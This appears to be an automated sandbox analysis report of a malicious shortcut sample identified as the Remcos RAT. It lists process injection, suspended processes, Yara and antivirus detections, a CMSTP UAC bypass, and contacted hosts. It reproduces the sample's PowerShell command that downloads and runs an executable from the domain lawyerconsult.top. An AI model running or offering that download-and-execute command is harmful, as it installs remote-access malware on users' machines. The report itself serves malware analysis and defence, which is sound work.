Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4A0000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 560000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 310000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040D72E cpuid

11_2_0040D72E

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	11_2_00401F9D
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoA,	12_2_6FE44DBC
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	12_2_6FE289B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	13_2_6C934DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	13_2_6C9189B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	19_2_6FEC4DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	19_2_6FEA89B5

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

11_2_00401626

Source: C:\Users\user\DZIPR.exe

Code function: 12_2_6FE3D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

12_2_6FE3D72B

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

11_2_00404FAA

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.94.3.25	lawyerconsult.top	United States		3223	VOXILITYGB	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
lawyerconsult.top	172.94.3.25	true
171.39.242.20.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lawyerconsult.top/AUGUST.exe	true	Avira URL Cloud: safe	unknown
fullimmersion777.com	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\paogviura	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Avira: detection malicious, Label: BDS/Backdoor.Gen

Found malware configuration

Source: 20.2.cmd.exe.55000c8.7.raw.unpack

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\lejp	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\paogviura	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	ReversingLabs: Detection: 86%

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\paogviura	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MdkbG2pK4l.lnk

Joe Sandbox ML: detected

Source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_1dcf3d25-f

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DZIPR.exe PID: 7580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
